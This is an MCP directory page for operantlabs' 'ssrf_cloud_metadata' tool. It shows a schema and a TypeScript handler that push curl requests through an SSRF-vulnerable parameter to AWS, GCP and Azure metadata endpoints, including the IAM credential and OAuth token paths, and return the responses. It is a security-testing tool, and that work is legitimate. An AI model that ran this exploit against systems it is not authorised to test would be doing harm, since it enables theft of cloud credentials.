Skip to main content
Glama
operantlabs

operant-mcp

Official
by operantlabs
OverviewSchemaRelated ServersScoreDiscussions
TypeScript
Local

ssrf_cloud_metadata

Test SSRF vulnerabilities by accessing cloud metadata endpoints (AWS/GCP/Azure) to identify potential exposure of IAM credentials and instance data.

Instructions

Test SSRF access to cloud metadata endpoints (AWS/GCP/Azure). Attempts to reach instance metadata services through the SSRF vector. Returns results array with provider, endpoint, status, length, response_snippet. Side effects: May cause target to request cloud metadata. Could expose IAM credentials if successful.

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
urlYesTarget URL with SSRF-vulnerable parameter
parameterYesParameter that accepts URLs
cloud_providerNoCloud provider to test metadata endpoints for
methodNoHTTP method

Implementation Reference

  • src/tools/ssrf.ts:123-200 (handler)
    The handler for the ssrf_cloud_metadata tool. It constructs and sends curl requests to common cloud metadata endpoints to check for SSRF vulnerabilities.
    async ({ url, parameter, cloud_provider = "all", method = "POST" }) => {
  requireTool("curl");

  const endpoints: Record<string, Array<[string, string]>> = {
    aws: [
      ["instance_id", "http://169.254.169.254/latest/meta-data/instance-id"],
      ["iam_role", "http://169.254.169.254/latest/meta-data/iam/security-credentials/"],
      ["user_data", "http://169.254.169.254/latest/user-data"],
      ["hostname", "http://169.254.169.254/latest/meta-data/hostname"],
      ["token_v2", "http://169.254.169.254/latest/api/token"],
    ],
    gcp: [
      ["project_id", "http://metadata.google.internal/computeMetadata/v1/project/project-id"],
      ["service_accounts", "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"],
      ["hostname", "http://metadata.google.internal/computeMetadata/v1/instance/hostname"],
    ],
    azure: [
      ["instance", "http://169.254.169.254/metadata/instance?api-version=2021-02-01"],
      ["identity", "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"],
    ],
  };

  const providersToTest =
    cloud_provider === "all" ? Object.keys(endpoints) : [cloud_provider];

  const results = [];
  for (const provider of providersToTest) {
    for (const [epName, epUrl] of endpoints[provider] ?? []) {
      let curlArgs: string[];
      if (method === "POST") {
        curlArgs = [
          "-sk",
          "-o", "-",
          "-w", "\n__META__%{http_code}:%{size_download}",
          "-X", "POST",
          "-d", `${parameter}=${epUrl}`,
          url,
        ];
      } else {
        curlArgs = [
          "-sk",
          "-o", "-",
          "-w", "\n__META__%{http_code}:%{size_download}",
          `${url}?${parameter}=${epUrl}`,
        ];
      }

      const res = await runCmd("curl", curlArgs);
      let body = res.stdout;
      const metaMarker = body.lastIndexOf("__META__");
      let status = 0;
      let length = 0;
      if (metaMarker !== -1) {
        const meta = body.slice(metaMarker + 8).trim();
        const parts = meta.split(":");
        status = parts.length > 0 ? parseInt(parts[0], 10) : 0;
        length = parts.length > 1 ? parseInt(parts[1], 10) : 0;
        body = body.slice(0, metaMarker);
      }

      results.push({
        provider,
        endpoint_name: epName,
        metadata_url: epUrl,
        status,
        length,
        response_snippet: body.slice(0, 500),
      });
    }
  }

  const result = {
    cloud_provider,
    results,
    hint: "Non-error responses with meaningful content indicate cloud metadata exposure.",
  };
  return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
}
  • src/tools/ssrf.ts:111-122 (registration)
    Registration of the ssrf_cloud_metadata tool, including its schema definition.
    server.tool(
  "ssrf_cloud_metadata",
  "Test SSRF access to cloud metadata endpoints (AWS/GCP/Azure). Attempts to reach instance metadata services through the SSRF vector. Returns results array with provider, endpoint, status, length, response_snippet. Side effects: May cause target to request cloud metadata. Could expose IAM credentials if successful.",
  {
    url: z.string().describe("Target URL with SSRF-vulnerable parameter"),
    parameter: z.string().describe("Parameter that accepts URLs"),
    cloud_provider: z
      .enum(["aws", "gcp", "azure", "all"])
      .optional()
      .describe("Cloud provider to test metadata endpoints for"),
    method: z.enum(["GET", "POST"]).optional().describe("HTTP method"),
  },
Install Server

Other Tools

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/operantlabs/operant-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server